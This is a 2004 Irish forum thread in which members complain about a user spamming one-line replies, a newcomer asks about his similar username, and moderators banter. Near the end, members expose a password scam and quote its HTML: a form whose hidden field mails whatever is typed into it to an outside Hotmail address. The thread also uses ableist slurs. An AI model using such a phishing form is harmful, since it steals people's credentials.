Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Agent Smith

Options
  • 23-04-2004 2:58am
    Closed Accounts Posts: 1,839 ✭✭✭

Ok, this guy has pissed me off for the last few night by seriously impacting my boards.ie experience. The retard keeps posting crappy one liner replys to a **** load of threads everynight - meaning the latest 20 posts on the main page are all his. Fine, if he has to comment about every joke on the humour board, so be it - but if you look at his posts you'll see its a lame attempt to boost his post count - just dribble - not making any contribuation to any thread.

The retards post count should be locked to 100 posts or something.
    Post edited by Shield on

Comments

• Registered Users Posts: 2,680 ✭✭✭Tellox

Originally posted by bubbles
    Ok, this guy has pissed me off for the last few night by seriously impacting my boards.ie experience. The retard keeps posting crappy one liner replys to a **** load of threads everynight - meaning the latest 20 posts on the main page are all his. Fine, if he has to comment about every joke on the humour board, so be it - but if you look at his posts you'll see its a lame attempt to boost his post count - just dribble - not making any contribuation to any thread.

The retards post count should be locked to 100 posts or something.

Agreed. He's ruining it for all of us :(

• Closed Accounts Posts: 7,488 ✭✭✭SantaHoe

LOL!!!

• Closed Accounts Posts: 1,443 ✭✭✭cartman

i was just thinking that ,he writes complete bs ... freeze his account at 100.

• Banned (with Prison Access) Posts: 23,556 ✭✭✭✭Sir Digby Chicken Caesar

give him his own board!

• Registered Users Posts: 6,810 ✭✭✭DRakE

LAUGH OUT LOUD!

• Advertisement
  • Closed Accounts Posts: 356 ✭✭agent_smith

Are you guys talking about me? I just joined about two days ago and picked agent_smith as a handle. But this is only my fourth post or something. Is it possible to change my sign in name if its possible that i am going to get hassle from people thinking im 'agent smith' ???

• Closed Accounts Posts: 1,839 ✭✭✭bubbles

agent_smith there is another person who has been registered for a while under the nick Agent Smith - so its not you we are talking about, you might want to consider picking a new nickname as you may be confused for the other pleb.

• Closed Accounts Posts: 1,008 ✭✭✭Tivoli

i have seen him do that about 3 times, not sure what the thrill is

• Registered Users Posts: 6,905 ✭✭✭User45701

He can post if he wants - you have a problem add him to ignore.

• Closed Accounts Posts: 2,922 ✭✭✭Dave

I'm witrh bubbles on this one. What's next you have to wonder? Sending unsolicited pm's? Where will the madness stop?

• Advertisement
  • Moderators, Social & Fun Moderators Posts: 42,362 Mod ✭✭✭✭Beruthiel

ahh bubbles honey, don't be so mean, he's only a young fella and is doing you no harm

I think you get overly upset too easily, may I recommend the following to help with your nerves:

listen to this:

whalemusic.jpg

while soaking in one of these:

bath.jpg

• Closed Accounts Posts: 5,025 ✭✭✭yellum

A bubbles bath. Interesting. You going to be in the bath at the time Beruthiel ?

• Registered Users Posts: 2,267 ✭✭✭Exit

She took down the picture of her arse! :eek:

Originally posted by yellum
    A bubbles bath. Interesting. You going to be in the bath at the time Beruthiel ?

that would be a negative there yellum..... perhaps you could oblige instead?

• Closed Accounts Posts: 1,163 ✭✭✭Emboss

Tha bath looks like a nice place for amp's orgy,

is it yours Beruthiel ? :D

• Business & Finance Moderators, Entertainment Moderators Posts: 32,387 Mod ✭✭✭✭DeVore

bubbles.... bath..... ah jesus, now my brain needs scrubbing.

I hadnt noticed the reported behaviour. Anyone spamming for post count will just have their post count altered or be banned or whatever. agent_smith... welcome to Boards, sorry about the confusion, send me a message if you want your name altered.

DeV.

• Closed Accounts Posts: 1,163 ✭✭✭Emboss

Originally posted by DeVore

I hadnt noticed the reported behaviour. Anyone spamming for post count will just have their post count altered or be banned or whatever. agent_smith... welcome to Boards, sorry about the confusion, send me a message if you want your name altered.

DeV.

I don't think he's doing it on purpose.

i haven't noticed it much anyway

bubbles is a bully :mad:

Originally posted by DeVore

10 Hail Marys
    and an Our Father sound sort that for ya

• Registered Users Posts: 1,604 ✭✭✭blondie83

give him a break, sure the guy just enjoys posting. Anyway some of his one liners are pretty well placed!

• Registered Users Posts: 1,562 ✭✭✭Snaga

yeah I agree with Blondie, I mean all of his 57 'lol!' posts were in the humour forum like.

• Advertisement
  • Registered Users Posts: 6,420 ✭✭✭Doodee

amp test

• Registered Users Posts: 3,312 ✭✭✭mr_angry

In fairness, thats what the ignore button is for. Maybe it should be changed to something more abvious for the antagonised poster though. Like an "OMG! STFU!!!" button.

I notice this is my 4th or 5th theres-already-a-feature-there-for-that post in the last couple of days. Isn't anybody going to shout at me or get annoyed? :confused::)

• Registered Users Posts: 6,420 ✭✭✭Doodee

MR_angry. i think certain people would rather choose to ignore the ignore button and just pray someone gets punished.

Kinda like the middle ages!

BURN DEVORE! SHE'S A WITCH!

• Moderators, Social & Fun Moderators Posts: 10,501 Mod ✭✭✭✭ecksor

scree, what's the deal with those links? You smell pretty trolly ...

• Registered Users Posts: 2,680 ✭✭✭Tellox

Originally posted by scree
    this sorta tng aint on

http://www.boards.ie/vbulletin/showthread.php?s=&postid=1565684#post1565684

Password scam!

• Moderators, Business & Finance Moderators, Society & Culture Moderators Posts: 9,763 Mod ✭✭✭✭ToxicPaddy

Originally posted by Tellox
    Password scam!

Seems like it to me....

• Registered Users Posts: 1,967 ✭✭✭Dun

Indeed-ee-oh:
    <FORM ACTION="http://homepage.eircom.net/cgi-bin/auto_mail.cgi" METHOD='post"'>
    <INPUT TYPE="HIDDEN" NAME="TO" VALUE="CreggPhilips@hotmail.com">

• Moderators, Social & Fun Moderators Posts: 10,501 Mod ✭✭✭✭ecksor

:rolleyes:

I must be getting old not to cop on to that one. Thanks Tellox.

• Business & Finance Moderators, Entertainment Moderators Posts: 32,387 Mod ✭✭✭✭DeVore

its gone. lets see what I can find out about Mr Philips cos I really feel like fncking someones **** up right about now...

DeV.

• Advertisement
  • Closed Accounts Posts: 4 concretedonkey

/me makes retarded noises at ecksor, aren't you the security dude?

Another glenstal me thinks, LOL.. Go get em dev!! :D

This discussion has been closed.
Advertisement